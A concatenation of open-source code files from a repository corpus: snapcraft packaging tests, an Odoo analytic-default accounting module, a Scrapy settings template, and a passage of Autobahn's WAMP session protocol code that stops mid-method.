filepath='usr/share/completions/complete.sh',
key='completer')),
]
def test_file_path_entry(self):
self.config_data['apps'] = {
'app': {
'command': 'echo "hello"',
self.key: self.filepath,
}
}
self.assertRaises(
errors.SnapcraftPathEntryError, self.generate_meta_yaml)
class CreateWithGradeTestCase(CreateBaseTestCase):
scenarios = [(grade, dict(grade=grade)) for
grade in ['stable', 'devel']]
def test_create_meta_with_grade(self):
self.config_data['grade'] = self.grade
y = self.generate_meta_yaml()
self.assertTrue(
'grade' in y,
'Expected "grade" property to be in snap.yaml')
self.assertThat(y['grade'], Equals(self.grade))
# TODO this needs more tests.
class WrapExeTestCase(unit.TestCase):
def setUp(self):
super().setUp()
# TODO move to use outer interface
self.packager = _snap_packaging._SnapPackaging(
{'confinement': 'devmode'},
ProjectOptions(),
'dummy'
)
self.packager._is_host_compatible_with_base = True
@patch('snapcraft.internal.common.assemble_env')
def test_wrap_exe_must_write_wrapper(self, mock_assemble_env):
mock_assemble_env.return_value = """\
PATH={0}/part1/install/usr/bin:{0}/part1/install/bin
""".format(self.parts_dir)
relative_exe_path = 'test_relexepath'
_create_file(os.path.join(self.prime_dir, relative_exe_path))
# Check that the wrapper is created even if there is already a file
# with the same name.
_create_file(os.path.join(self.prime_dir, 'test_relexepath.wrapper'))
relative_wrapper_path = self.packager._wrap_exe(relative_exe_path)
wrapper_path = os.path.join(self.prime_dir, relative_wrapper_path)
expected = ('#!/bin/sh\n'
'PATH=$SNAP/usr/bin:$SNAP/bin\n\n'
'export LD_LIBRARY_PATH=$SNAP_LIBRARY_PATH:'
'$LD_LIBRARY_PATH\n'
'exec "$SNAP/test_relexepath" "$@"\n')
self.assertThat(wrapper_path, FileContains(expected))
@patch('snapcraft.internal.common.assemble_env')
def test_empty_wrapper_if_not_on_compatible_host_for_target_base(
self, mock_assemble_env):
self.packager._is_host_compatible_with_base = False
mock_assemble_env.return_value = """\
PATH={0}/part1/install/usr/bin:{0}/part1/install/bin
""".format(self.parts_dir)
relative_exe_path = 'test_relexepath'
_create_file(os.path.join(self.prime_dir, relative_exe_path))
# Check that the wrapper is created even if there is already a file
# with the same name.
_create_file(os.path.join(self.prime_dir, 'test_relexepath.wrapper'))
relative_wrapper_path = self.packager._wrap_exe(relative_exe_path)
wrapper_path = os.path.join(self.prime_dir, relative_wrapper_path)
expected = ('#!/bin/sh\n'
'exec "$SNAP/test_relexepath" "$@"\n')
self.assertThat(wrapper_path, FileContains(expected))
@patch('snapcraft.internal.common.assemble_env')
def test_wrap_exe_writes_wrapper_with_basename(self, mock_assemble_env):
mock_assemble_env.return_value = """\
PATH={0}/part1/install/usr/bin:{0}/part1/install/bin
""".format(self.parts_dir)
relative_exe_path = 'test_relexepath'
_create_file(os.path.join(self.prime_dir, relative_exe_path))
relative_wrapper_path = self.packager._wrap_exe(
relative_exe_path, basename='new-name')
wrapper_path = os.path.join(self.prime_dir, relative_wrapper_path)
self.assertThat(relative_wrapper_path, Equals('new-name.wrapper'))
expected = ('#!/bin/sh\n'
'PATH=$SNAP/usr/bin:$SNAP/bin\n\n'
'export LD_LIBRARY_PATH=$SNAP_LIBRARY_PATH:'
'$LD_LIBRARY_PATH\n'
'exec "$SNAP/test_relexepath" "$@"\n')
self.assertThat(wrapper_path, FileContains(expected))
def test_snap_shebangs_extracted(self):
"""Shebangs pointing to the snap's install dir get extracted.
If the exe has a shebang that points to the snap's install dir,
the wrapper script will execute it directly rather than relying
on the shebang.
The shebang needs to be an absolute path, and we don't know
in which directory the snap will be installed. Executing
it in the wrapper script allows us to use the $SNAP environment
variable.
"""
relative_exe_path = 'test_relexepath'
shebang_path = os.path.join(
self.parts_dir, 'testsnap', 'install', 'snap_exe')
exe_contents = '#!{}\n'.format(shebang_path)
_create_file(os.path.join(self.prime_dir, relative_exe_path),
content=exe_contents)
relative_wrapper_path = self.packager._wrap_exe(relative_exe_path)
wrapper_path = os.path.join(self.prime_dir, relative_wrapper_path)
expected = (
'#!/bin/sh\n'
'exec "$SNAP/snap_exe" "$SNAP/test_relexepath" "$@"\n')
self.assertThat(wrapper_path, FileContains(expected))
# The shebang wasn't changed, since we don't know what the
# path will be on the installed system.
self.assertThat(os.path.join(self.prime_dir, relative_exe_path),
FileContains(exe_contents))
def test_non_snap_shebangs_ignored(self):
"""Shebangs not pointing to the snap's install dir are ignored.
If the shebang points to a system executable, there's no need to
interfere.
"""
relative_exe_path = 'test_relexepath'
exe_contents = '#!/bin/bash\necho hello\n'
_create_file(os.path.join(self.prime_dir, relative_exe_path),
content=exe_contents)
relative_wrapper_path = self.packager._wrap_exe(relative_exe_path)
wrapper_path = os.path.join(self.prime_dir, relative_wrapper_path)
expected = ('#!/bin/sh\n'
'exec "$SNAP/test_relexepath" "$@"\n')
self.assertThat(wrapper_path, FileContains(expected))
self.assertThat(os.path.join(self.prime_dir, relative_exe_path),
FileContains(exe_contents))
def test_non_shebang_binaries_ignored(self):
"""Native binaries are ignored.
If the executable is a native binary, and thus not have a
shebang, it's ignored.
"""
relative_exe_path = 'test_relexepath'
# Choose a content which can't be decoded with utf-8, to make
# sure no decoding errors happen.
exe_contents = b'\xf0\xf1'
path = os.path.join(self.prime_dir, relative_exe_path)
_create_file(path, content=exe_contents)
relative_wrapper_path = self.packager._wrap_exe(relative_exe_path)
wrapper_path = os.path.join(self.prime_dir, relative_wrapper_path)
expected = ('#!/bin/sh\n'
'exec "$SNAP/test_relexepath" "$@"\n')
self.assertThat(wrapper_path, FileContains(expected))
with open(path, 'rb') as exe:
self.assertThat(exe.read(), Equals(exe_contents))
@patch('snapcraft.internal.common.run_output')
def test_exe_is_in_path(self, run_mock):
app_path = os.path.join(self.prime_dir, 'bin', 'app1')
_create_file(app_path)
relative_wrapper_path = self.packager._wrap_exe('app1')
wrapper_path = os.path.join(self.prime_dir, relative_wrapper_path)
expected = ('#!/bin/sh\n'
'exec "app1" "$@"\n')
self.assertThat(wrapper_path, FileContains(expected))
def test_command_does_not_exist(self):
common.env = ['PATH={}/bin:$PATH'.format(self.prime_dir)]
apps = {'app1': {'command': 'command-does-not-exist'}}
raised = self.assertRaises(
errors.InvalidAppCommandError,
self.packager._wrap_apps, apps)
self.assertThat(raised.command, Equals('command-does-not-exist'))
self.assertThat(raised.app, Equals('app1'))
def test_command_is_not_executable(self):
common.env = ['PATH={}/bin:$PATH'.format(self.prime_dir)]
apps = {'app1': {'command': 'command-not-executable'}}
cmd_path = os.path.join(self.prime_dir, 'bin', apps['app1']['command'])
_create_file(cmd_path)
raised = self.assertRaises(
errors.InvalidAppCommandError,
self.packager._wrap_apps, apps)
self.assertThat(raised.command, Equals('command-not-executable'))
self.assertThat(raised.app, Equals('app1'))
def test_command_found(self):
common.env = ['PATH={}/bin:$PATH'.format(self.prime_dir)]
apps = {'app1': {'command': 'command-executable'}}
cmd_path = os.path.join(self.prime_dir, 'bin', apps['app1']['command'])
_create_file(cmd_path, executable=True)
wrapped_apps = self.packager._wrap_apps(apps)
self.assertThat(wrapped_apps,
Equals({'app1': {'command': 'command-app1.wrapper'}}))
def _create_file(path, *, content='', executable=False):
basepath = os.path.dirname(path)
if basepath:
os.makedirs(basepath, exist_ok=True)
mode = 'wb' if type(content) == bytes else 'w'
with open(path, mode) as f:
f.write(content)
if executable:
os.chmod(path, 0o755)
|
gpl-3.0
|
numerigraphe/odoo
|
addons/account_analytic_default/account_analytic_default.py
|
256
|
8118
|
# -*- coding: utf-8 -*-
###############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
class account_analytic_default(osv.osv):
_name = "account.analytic.default"
_description = "Analytic Distribution"
_rec_name = "analytic_id"
_order = "sequence"
_columns = {
'sequence': fields.integer('Sequence', help="Gives the sequence order when displaying a list of analytic distribution"),
'analytic_id': fields.many2one('account.analytic.account', 'Analytic Account'),
'product_id': fields.many2one('product.product', 'Product', ondelete='cascade', help="Select a product which will use analytic account specified in analytic default (e.g. create new customer invoice or Sales order if we select this product, it will automatically take this as an analytic account)"),
'partner_id': fields.many2one('res.partner', 'Partner', ondelete='cascade', help="Select a partner which will use analytic account specified in analytic default (e.g. create new customer invoice or Sales order if we select this partner, it will automatically take this as an analytic account)"),
'user_id': fields.many2one('res.users', 'User', ondelete='cascade', help="Select a user which will use analytic account specified in analytic default."),
'company_id': fields.many2one('res.company', 'Company', ondelete='cascade', help="Select a company which will use analytic account specified in analytic default (e.g. create new customer invoice or Sales order if we select this company, it will automatically take this as an analytic account)"),
'date_start': fields.date('Start Date', help="Default start date for this Analytic Account."),
'date_stop': fields.date('End Date', help="Default end date for this Analytic Account."),
}
def account_get(self, cr, uid, product_id=None, partner_id=None, user_id=None, date=None, company_id=None, context=None):
domain = []
if product_id:
domain += ['|', ('product_id', '=', product_id)]
domain += [('product_id','=', False)]
if partner_id:
domain += ['|', ('partner_id', '=', partner_id)]
domain += [('partner_id', '=', False)]
if company_id:
domain += ['|', ('company_id', '=', company_id)]
domain += [('company_id', '=', False)]
if user_id:
domain += ['|',('user_id', '=', user_id)]
domain += [('user_id','=', False)]
if date:
domain += ['|', ('date_start', '<=', date), ('date_start', '=', False)]
domain += ['|', ('date_stop', '>=', date), ('date_stop', '=', False)]
best_index = -1
res = False
for rec in self.browse(cr, uid, self.search(cr, uid, domain, context=context), context=context):
index = 0
if rec.product_id: index += 1
if rec.partner_id: index += 1
if rec.company_id: index += 1
if rec.user_id: index += 1
if rec.date_start: index += 1
if rec.date_stop: index += 1
if index > best_index:
res = rec
best_index = index
return res
class account_invoice_line(osv.osv):
_inherit = "account.invoice.line"
_description = "Invoice Line"
def product_id_change(self, cr, uid, ids, product, uom_id, qty=0, name='', type='out_invoice', partner_id=False, fposition_id=False, price_unit=False, currency_id=False, company_id=None, context=None):
res_prod = super(account_invoice_line, self).product_id_change(cr, uid, ids, product, uom_id, qty, name, type, partner_id, fposition_id, price_unit, currency_id=currency_id, company_id=company_id, context=context)
rec = self.pool.get('account.analytic.default').account_get(cr, uid, product, partner_id, uid, time.strftime('%Y-%m-%d'), company_id=company_id, context=context)
if rec:
res_prod['value'].update({'account_analytic_id': rec.analytic_id.id})
else:
res_prod['value'].update({'account_analytic_id': False})
return res_prod
class stock_picking(osv.osv):
_inherit = "stock.picking"
def _get_account_analytic_invoice(self, cursor, user, picking, move_line):
partner_id = picking.partner_id and picking.partner_id.id or False
rec = self.pool.get('account.analytic.default').account_get(cursor, user, move_line.product_id.id, partner_id, user, time.strftime('%Y-%m-%d'))
if rec:
return rec.analytic_id.id
return super(stock_picking, self)._get_account_analytic_invoice(cursor, user, picking, move_line)
class sale_order_line(osv.osv):
_inherit = "sale.order.line"
# Method overridden to set the analytic account by default on criterion match
def invoice_line_create(self, cr, uid, ids, context=None):
create_ids = super(sale_order_line, self).invoice_line_create(cr, uid, ids, context=context)
if not ids:
return create_ids
sale_line = self.browse(cr, uid, ids[0], context=context)
inv_line_obj = self.pool.get('account.invoice.line')
anal_def_obj = self.pool.get('account.analytic.default')
for line in inv_line_obj.browse(cr, uid, create_ids, context=context):
rec = anal_def_obj.account_get(cr, uid, line.product_id.id, sale_line.order_id.partner_id.id, sale_line.order_id.user_id.id, time.strftime('%Y-%m-%d'), context=context)
if rec:
inv_line_obj.write(cr, uid, [line.id], {'account_analytic_id': rec.analytic_id.id}, context=context)
return create_ids
class product_product(osv.Model):
_inherit = 'product.product'
def _rules_count(self, cr, uid, ids, field_name, arg, context=None):
Analytic = self.pool['account.analytic.default']
return {
product_id: Analytic.search_count(cr, uid, [('product_id', '=', product_id)], context=context)
for product_id in ids
}
_columns = {
'rules_count': fields.function(_rules_count, string='# Analytic Rules', type='integer'),
}
class product_template(osv.Model):
_inherit = 'product.template'
def _rules_count(self, cr, uid, ids, field_name, arg, context=None):
Analytic = self.pool['account.analytic.default']
res = {}
for product_tmpl_id in self.browse(cr, uid, ids, context=context):
res[product_tmpl_id.id] = sum([p.rules_count for p in product_tmpl_id.product_variant_ids])
return res
_columns = {
'rules_count': fields.function(_rules_count, string='# Analytic Rules', type='integer'),
}
def action_view_rules(self, cr, uid, ids, context=None):
products = self._get_products(cr, uid, ids, context=context)
result = self._get_act_window_dict(cr, uid, 'account_analytic_default.action_product_default_list', context=context)
result['domain'] = "[('product_id','in',[" + ','.join(map(str, products)) + "])]"
# Remove context so it is not going to filter on product_id with active_id of template
result['context'] = "{}"
return result
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
amozie/amozie
|
studzie/scrapy_tutor/hello/hello/settings.py
|
1
|
3118
|
# -*- coding: utf-8 -*-
# Scrapy settings for hello project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'hello'
SPIDER_MODULES = ['hello.spiders']
NEWSPIDER_MODULE = 'hello.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'hello (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'hello.middlewares.HelloSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'hello.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'hello.pipelines.HelloPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
|
apache-2.0
|
meejah/AutobahnPython
|
autobahn/wamp/protocol.py
|
1
|
61912
|
###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Tavendo GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
from __future__ import absolute_import
import six
import txaio
import inspect
from autobahn import wamp
from autobahn.util import IdGenerator, ObservableMixin
from autobahn.wamp import uri
from autobahn.wamp import message
from autobahn.wamp import types
from autobahn.wamp import role
from autobahn.wamp import exception
from autobahn.wamp.exception import ApplicationError, ProtocolError, SessionNotReady, SerializationError
from autobahn.wamp.interfaces import IApplicationSession # noqa
from autobahn.wamp.types import SessionDetails
from autobahn.wamp.cryptobox import EncryptedPayload
from autobahn.wamp.request import \
Publication, \
Subscription, \
Handler, \
Registration, \
Endpoint, \
PublishRequest, \
SubscribeRequest, \
UnsubscribeRequest, \
CallRequest, \
InvocationRequest, \
RegisterRequest, \
UnregisterRequest
def is_method_or_function(f):
return inspect.ismethod(f) or inspect.isfunction(f)
class BaseSession(ObservableMixin):
"""
WAMP session base class.
This class implements :class:`autobahn.wamp.interfaces.ISession`.
"""
def __init__(self):
"""
"""
self.set_valid_events(
valid_events=[
'join', # right before onJoin runs
'leave', # after onLeave has run
'ready', # after onJoin and all 'join' listeners have completed
'connect', # right before onConnect
'disconnect', # right after onDisconnect
]
)
# this is for marshalling traceback from exceptions thrown in user
# code within WAMP error messages (that is, when invoking remoted
# procedures)
self.traceback_app = False
# mapping of exception classes to WAMP error URIs
self._ecls_to_uri_pat = {}
# mapping of WAMP error URIs to exception classes
self._uri_to_ecls = {
ApplicationError.INVALID_PAYLOAD: SerializationError
}
# session authentication information
self._authid = None
self._authrole = None
self._authmethod = None
self._authprovider = None
# end-to-end encryption keyring
self._keyring = None
# generator for WAMP request IDs
self._request_id_gen = IdGenerator()
def define(self, exception, error=None):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.define`
"""
if error is None:
assert(hasattr(exception, '_wampuris'))
self._ecls_to_uri_pat[exception] = exception._wampuris
self._uri_to_ecls[exception._wampuris[0].uri()] = exception
else:
assert(not hasattr(exception, '_wampuris'))
self._ecls_to_uri_pat[exception] = [uri.Pattern(six.u(error), uri.Pattern.URI_TARGET_HANDLER)]
self._uri_to_ecls[six.u(error)] = exception
def _message_from_exception(self, request_type, request, exc, tb=None, enc_algo=None):
"""
Create a WAMP error message from an exception.
:param request_type: The request type this WAMP error message is for.
:type request_type: int
:param request: The request ID this WAMP error message is for.
:type request: int
:param exc: The exception.
:type exc: Instance of :class:`Exception` or subclass thereof.
:param tb: Optional traceback. If present, it'll be included with the WAMP error message.
:type tb: list or None
"""
assert(enc_algo is None or enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX)
args = None
if hasattr(exc, 'args'):
args = list(exc.args) # make sure tuples are made into lists
kwargs = None
if hasattr(exc, 'kwargs'):
kwargs = exc.kwargs
if tb:
if kwargs:
kwargs['traceback'] = tb
else:
kwargs = {'traceback': tb}
if isinstance(exc, exception.ApplicationError):
error = exc.error if type(exc.error) == six.text_type else six.u(exc.error)
else:
if exc.__class__ in self._ecls_to_uri_pat:
error = self._ecls_to_uri_pat[exc.__class__][0]._uri
else:
error = u"wamp.error.runtime_error"
encrypted_payload = None
if self._keyring:
encrypted_payload = self._keyring.encrypt(False, error, args, kwargs)
if encrypted_payload:
msg = message.Error(request_type,
request,
error,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer)
else:
msg = message.Error(request_type,
request,
error,
args,
kwargs)
return msg
def _exception_from_message(self, msg):
"""
Create a user (or generic) exception from a WAMP error message.
:param msg: A WAMP error message.
:type msg: instance of :class:`autobahn.wamp.message.Error`
"""
# FIXME:
# 1. map to ecls based on error URI wildcard/prefix
# 2. extract additional args/kwargs from error URI
exc = None
enc_err = None
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
if not self._keyring:
log_msg = u"received encrypted payload, but no keyring active"
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_NO_KEYRING_ACTIVE, log_msg, enc_algo=msg.enc_algo)
else:
try:
encrypted_payload = EncryptedPayload(msg.enc_algo, msg.enc_key, msg.enc_serializer, msg.payload)
decrypted_error, msg.args, msg.kwargs = self._keyring.decrypt(True, msg.error, encrypted_payload)
except Exception as e:
self.log.warn("failed to decrypt application payload 1: {err}", err=e)
enc_err = ApplicationError(
ApplicationError.ENC_DECRYPT_ERROR,
u"failed to decrypt application payload 1: {}".format(e),
enc_algo=msg.enc_algo,
)
else:
if msg.error != decrypted_error:
self.log.warn(
u"URI within encrypted payload ('{decrypted_error}') does not match the envelope ('{error}')",
decrypted_error=decrypted_error,
error=msg.error,
)
enc_err = ApplicationError(
ApplicationError.ENC_TRUSTED_URI_MISMATCH,
u"URI within encrypted payload ('{}') does not match the envelope ('{}')".format(decrypted_error, msg.error),
enc_algo=msg.enc_algo,
)
if enc_err:
return enc_err
if msg.error in self._uri_to_ecls:
ecls = self._uri_to_ecls[msg.error]
try:
# the following might fail, eg. TypeError when
# signature of exception constructor is incompatible
# with args/kwargs or when the exception constructor raises
if msg.kwargs:
if msg.args:
exc = ecls(*msg.args, **msg.kwargs)
else:
exc = ecls(**msg.kwargs)
else:
if msg.args:
exc = ecls(*msg.args)
else:
exc = ecls()
except Exception:
try:
self.onUserError(
txaio.create_failure(),
"While re-constructing exception",
)
except:
pass
if not exc:
# the following ctor never fails ..
if msg.kwargs:
if msg.args:
exc = exception.ApplicationError(msg.error, *msg.args, **msg.kwargs)
else:
exc = exception.ApplicationError(msg.error, **msg.kwargs)
else:
if msg.args:
exc = exception.ApplicationError(msg.error, *msg.args)
else:
exc = exception.ApplicationError(msg.error)
if hasattr(exc, 'enc_algo'):
exc.enc_algo = msg.enc_algo
return exc
class ApplicationSession(BaseSession):
"""
WAMP endpoint session.
"""
log = txaio.make_logger()
def __init__(self, config=None):
"""
Constructor.
"""
BaseSession.__init__(self)
self.config = config or types.ComponentConfig(realm=u"default")
self._transport = None
self._session_id = None
self._realm = None
self._goodbye_sent = False
self._transport_is_closing = False
# outstanding requests
self._publish_reqs = {}
self._subscribe_reqs = {}
self._unsubscribe_reqs = {}
self._call_reqs = {}
self._register_reqs = {}
self._unregister_reqs = {}
# subscriptions in place
self._subscriptions = {}
# registrations in place
self._registrations = {}
# incoming invocations
self._invocations = {}
def set_keyring(self, keyring):
"""
"""
self._keyring = keyring
def onOpen(self, transport):
"""
Implements :func:`autobahn.wamp.interfaces.ITransportHandler.onOpen`
"""
self._transport = transport
d = self.fire('connect', self, transport)
txaio.add_callbacks(
d, None,
lambda fail: self._swallow_error(fail, "While notifying 'connect'")
)
txaio.add_callbacks(
d,
lambda _: txaio.as_future(self.onConnect),
None,
)
def onConnect(self):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.onConnect`
"""
self.join(self.config.realm)
def join(self, realm, authmethods=None, authid=None, authrole=None, authextra=None):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.join`
"""
# FIXME
if six.PY2 and type(realm) == str:
realm = six.u(realm)
if six.PY2 and type(authid) == str:
authid = six.u(authid)
if six.PY2 and type(authrole) == str:
authrole = six.u(authrole)
if self._session_id:
raise Exception("already joined")
# store the realm requested by client, though this might be overwritten later,
# when realm redirection kicks in
self._realm = realm
# closing handshake state
self._goodbye_sent = False
# send HELLO message to router
msg = message.Hello(realm, role.DEFAULT_CLIENT_ROLES, authmethods, authid, authrole, authextra)
self._transport.send(msg)
def disconnect(self):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.disconnect`
"""
if self._transport:
self._transport.close()
def is_connected(self):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.is_connected`
"""
return self._transport is not None
def is_attached(self):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.is_attached`
"""
return self._session_id is not None
def onUserError(self, fail, msg):
"""
This is called when we try to fire a callback, but get an
exception from user code -- for example, a registered publish
callback or a registered method. By default, this prints the
current stack-trace and then error-message to stdout.
ApplicationSession-derived objects may override this to
provide logging if they prefer. The Twisted implemention does
this. (See :class:`autobahn.twisted.wamp.ApplicationSession`)
:param fail: instance implementing txaio.IFailedFuture
:param msg: an informative message from the library. It is
suggested you log this immediately after the exception.
"""
if isinstance(fail.value, exception.ApplicationError):
# silence on errors raised explicitly from the app
# previous code: self.log.error(fail.value.error_message())
pass
else:
self.log.error(
u'{msg}: {traceback}',
msg=msg,
traceback=txaio.failure_format_traceback(fail),
)
def _swallow_error(self, fail, msg):
'''
This is an internal generic error-handler for errors encountered
when calling down to on*() handlers that can reasonably be
expected to be overridden in user code.
Note that it *cancels* the error, so use with care!
Specifically, this should *never* be added to the errback
chain for a Deferred/coroutine that will make it out to user
code.
'''
try:
self.onUserError(fail, msg)
except Exception:
self.log.error(
"Internal error: {tb}",
tb=txaio.failure_format_traceback(txaio.create_failure()),
)
return None
def onMessage(self, msg):
"""
Implements :func:`autobahn.wamp.interfaces.ITransportHandler.onMessage`
"""
if self._session_id is None:
# the first message must be WELCOME, ABORT or CHALLENGE ..
if isinstance(msg, message.Welcome):
if msg.realm:
self._realm = msg.realm
self._session_id = msg.session
details = SessionDetails(self._realm, self._session_id, msg.authid, msg.authrole, msg.authmethod, msg.authprovider, msg.authextra)
# firing 'join' *before* running onJoin, so that the
# idiom where you "do stuff" in onJoin -- possibly
# including self.leave() -- works properly. Besides,
# there's "ready" that fires after 'join' and onJoin
# have all completed...
d = self.fire('join', self, details)
# add a logging errback first, which will ignore any
# errors from fire()
txaio.add_callbacks(
d, None,
lambda e: self._swallow_error(e, "While notifying 'join'")
)
# this should run regardless
txaio.add_callbacks(
d,
lambda _: txaio.as_future(self.onJoin, details),
None
)
# ignore any errors from onJoin (XXX or, should that be fatal?)
txaio.add_callbacks(
d, None,
lambda e: self._swallow_error(e, "While firing onJoin")
)
# this instance is now "ready"...
txaio.add_callbacks(
d,
lambda _: self.fire('ready', self),
None
)
# ignore any errors from 'ready'
txaio.add_callbacks(
d, None,
lambda e: self._swallow_error(e, "While notifying 'ready'")
)
elif isinstance(msg, message.Abort):
# fire callback and close the transport
details = types.CloseDetails(msg.reason, msg.message)
d = txaio.as_future(self.onLeave, details)
def success(arg):
# XXX also: handle async
self.fire('leave', self, details)
return arg
def _error(e):
return self._swallow_error(e, "While firing onLeave")
txaio.add_callbacks(d, success, _error)
elif isinstance(msg, message.Challenge):
challenge = types.Challenge(msg.method, msg.extra)
d = txaio.as_future(self.onChallenge, challenge)
def success(signature):
if signature is None:
raise Exception('onChallenge user callback did not return a signature')
if type(signature) == six.binary_type:
signature = signature.decode('utf8')
if type(signature) != six.text_type:
raise Exception('signature must be unicode (was {})'.format(type(signature)))
reply = message.Authenticate(signature)
self._transport.send(reply)
def error(err):
self.onUserError(err, "Authentication failed")
reply = message.Abort(u"wamp.error.cannot_authenticate", u"{0}".format(err.value))
self._transport.send(reply)
# fire callback and close the transport
details = types.CloseDetails(reply.reason, reply.message)
d = txaio.as_future(self.onLeave, details)
def success(arg):
# XXX also: handle async
self.fire('leave', self, details)
return arg
def _error(e):
return self._swallow_error(e, "While firing onLeave")
txaio.add_callbacks(d, success, _error)
# switching to the callback chain, effectively
# cancelling error (which we've now handled)
return d
txaio.add_callbacks(d, success, error)
else:
raise ProtocolError("Received {0} message, and session is not yet established".format(msg.__class__))
else:
# self._session_id != None (aka "session established")
if isinstance(msg, message.Goodbye):
if not self._goodbye_sent:
# the peer wants to close: send GOODBYE reply
reply = message.Goodbye()
self._transport.send(reply)
self._session_id = None
# fire callback and close the transport
details = types.CloseDetails(msg.reason, msg.message)
d = txaio.as_future(self.onLeave, details)
def success(arg):
# XXX also: handle async
self.fire('leave', self, details)
return arg
def _error(e):
errmsg = 'While firing onLeave for reason "{0}" and message "{1}"'.format(msg.reason, msg.message)
return self._swallow_error(e, errmsg)
txaio.add_callbacks(d, success, _error)
elif isinstance(msg, message.Event):
if msg.subscription in self._subscriptions:
# fire all event handlers on subscription ..
for subscription in self._subscriptions[msg.subscription]:
handler = subscription.handler
topic = msg.topic or subscription.topic
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
# FIXME: behavior in error cases (no keyring, decrypt issues, URI mismatch, ..)
if not self._keyring:
self.log.warn("received encrypted payload, but no keyring active - ignoring encrypted payload!")
else:
try:
encrypted_payload = EncryptedPayload(msg.enc_algo, msg.enc_key, msg.enc_serializer, msg.payload)
decrypted_topic, msg.args, msg.kwargs = self._keyring.decrypt(False, topic, encrypted_payload)
except Exception as e:
self.log.warn("failed to decrypt application payload: {error}", error=e)
else:
if topic != decrypted_topic:
